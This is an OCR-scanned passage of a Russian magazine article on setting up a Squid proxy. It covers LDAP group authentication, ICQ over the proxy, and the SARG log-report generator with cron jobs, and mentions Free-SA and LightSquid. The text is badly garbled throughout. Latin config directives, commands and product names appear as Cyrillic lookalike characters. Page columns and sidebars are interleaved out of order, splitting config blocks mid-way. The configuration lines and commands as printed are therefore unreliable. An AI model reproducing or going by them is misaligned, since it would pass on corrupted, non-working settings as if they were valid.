аиБЮрагат сЬіІсігеп 5 

аиБЮрагат Ьазіс геаіт Здиісі ргоху-сасЬіпд ілеЬ зегѵег 

аиБЮрагат Ьазіс сгеЬепБіаІзБРІ 2 Ьоигз 

асі 1Ьар_дгоир ргоху_аиБЬ ЕЕОБІЕЕБ 

ЫсРр_ассезз аііоѵ* 1Ьар_дгоир 

ЬББр_ассезз аііоѵ/ ІосаІЬозБ 

ЬББр_ассезз Ьепу аіі 

После перезапуска Здиісі все пользователи, входящие в указанную группу, 
будут выходить в интернет. 



ІС(2 

Через Здиісі можно организовать работу ІСф. В самом Здиісі для 
этого ничего делать не нужно. Должен быть разрешен доступ 
к порту 443 и метод ССЖКЕСТ (по умолчанию так и есть) . 
Большинство ІСф-клиентов позволяют указать в настройках 
прокси-сервер; при необходимости здесь же указываем логин и 
пароль для доступа. 
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Ргее-за — хорошая альтернатива 5АР6 



некоторых дистрах каталоги для Здиіб 3 . О назы- 
ваются здиібЗ 

ассезз_1од /ѵаг/Іод/здиібЗ /ассезз . Іод 

# Включаем построение графиков 
дгарйз уез 

дгар1т_бауз_Ъубез_Ъаг_со1ог дгееп 

# При необходимости можно ограничить просмотр 
отчетов 

# раззтлгогб /ебс/здиіб/загд . раззчлб 

# Каталог , в который помещаются отчеты 
оибриб_біг /ѵаг/тлллпл/здиіб-герогбз 

# Сортировка юзеров в выводе по ТЗЗЕК СОШГЕСТ 
ВУТЕЗ ТІМЕ 

боризег_зогб_біе1б ВУТЕЗ геѵегзе 
изег_зогб_біе1б ВУТЕЗ геѵегзе 

# Установка лимита в мегабайтах, пользователи, 
превысившие его , попадают в файл блокировок 

# рег_изег_1ітіб /ебс/здиіб/загд . изег-бепу 
300 




> Ііпкз 

Большое количество 
дополнений кЗдиісІ 
можно найти на сайте 
(гезЬтеабпеб 




НАСТРОЙКА 5АР6 

На данный момент мы имеем полностью настроенный 
ЗдиісІ, но расслабляться пока рано. В одно прекрасноеутро 
начальство захочетузнать, на каких сайтах бывают сотрудники 
компании, и сколько времени они там проводят. Всю нужную 
информацию можно найти в логах сквида: 

$ зибо баіі -б /ѵаг/іод/здиіб/ассезз . Іод I 
аѵбк ' {ргіпб$3 " " $8" "$7}' 

Считывать вручную — хотя и вполне реально, ноужочень 
неудобно. Ксчастью, для этого прокси-сервера написано 
невероятное количество анализаторов логов. Одним из 
самых популярных решений является 5АГСѲ (Бциіб Апаіузіз 
Рерогі Ѳепегаіог), который выдает подробную статистику по 
пользователям. На сайте проекта загд.збпеб кроме исход- 
ныхтекстов, можно найти пакеты для большого количества 
систем: бепіоо, РебНаі/Ребога, Бебіап, Зіаскѵѵаге, 51І5Е, 
*В50, МасОЗХидаже — ѴѴІпбоѵѵз с 05/2. В репозитариях 
пакетов большинства дистрибутивов все, что нужно, уже есть. 
Для просмотра отчетов 5АРѲ нам понадобится веб-сервер. В 
ІІЬипіи/ОеЬіап вводим: 



# Тип отчета, включаем все 
герогЕ_Ьуре боризегз борзібез зібез_изегз 
изегз_зібез бабе_біте бепіеб аиб]з_Еаі1игез 
зібе_изег_1:іте_бабе бохѵпіоабз 

# Для удобства можно конвертировать логины 
и ІР- адреса в реальные имена (файл должен 
содержать записи вида "изегіб/ІР-аббгезз имя") 
изегбаЬ /ебс/здиіб/загд .изегбаЬ 

Если оиѣриѣ_сііг находится вне корневого каталога АрасЬе, 
в арасЬе2. соЫ необходимо создать ал иас с указанием пути 
и дать нужные права. Ксожалению, при помощирег_изег_ 
Ііші ѣ можноуказать лимит один на всех, без учета пользова- 
телей и групп. 

Создание отчетов производится скриптом /ивг/вЫп/вагд- 
герогѣв, который запускается при помощи сгоп: 

$5исІосгопІаЬ-е 

00 08-18/1 * * * загд-герогбз бобау 
00 00 * * * загд-герогбз баііу 
00 01 * * 1 загд-герогбз ѵ^еекіу 
3 0 02 1 * * загд-герогбз шопбкіу 



> ѵѵагпіпд 

Для активации 
параметров в секции 
«Оеіау Рооіз» Зциіб 
должен быть собран 
сопцией --епаЫе- 
сіеіау-рооіз. 



$ зибо арб-деб іпзбаіі загд арасЬе2 

В ІІЬипІи настройки АрасЬе можно нетрогать. Будет 
работать и с параметрами поумолчанию. В различных 
дистрибутивах и операционных системах файлы могутбыть 
помещены в разные каталоги. В ббипіи место дислокации 
— /ебс/здиіб; конфигурационный файл называется 
загд. сопі. 



Теперь открываем браузер и заходим на страницу отчетов. 

В последнее время вместо 5АРѲ многие рекомендуют 
использовать Ргее-5А [ Ітее-за.зЕпеІ: ] — более легок и быстро 
создает отчеты. В перспективе, кроме Зциіб, Розбіх, Отаіі и 
С6Р, будут поддерживаться журналы других серверов. Еще 
один шустрый конкурент — І_ідЫ5диісі [ ІідЫвдиісІ.зЕпеі ]. Он 
прост в установке ипосравнениюс 5АРѲ занимает меньше 
места на жестком диске. 



$ зисіо тсесііі /еіс/здиісі/загд.соп* 

# Указываем язык, возможные значения: Киззіап- 
коі8, Киззіап_ІІТЕ-8 , Киззіап-ѵ\гіпбсжз12 51 
Іапдиаде Еиззіап_ІІТЕ-8 

скагзеб Сугііііс 

# Файл со статистикой, обрати внимание, что в 



ЗАКЛЮЧЕНИЕ 

Как видишь, распределение канала и настройка доступа 
с аутентификацией пользователей — нетакая уж сложная 
штука. Возможность использования учетных записей Ай или 
БОАР на порядок упрощает администрирование. Добавив 
кэтой схеме программу для анализа журналов, ты всегда 
будешь знать кто, когда, где и сколько :). □С 
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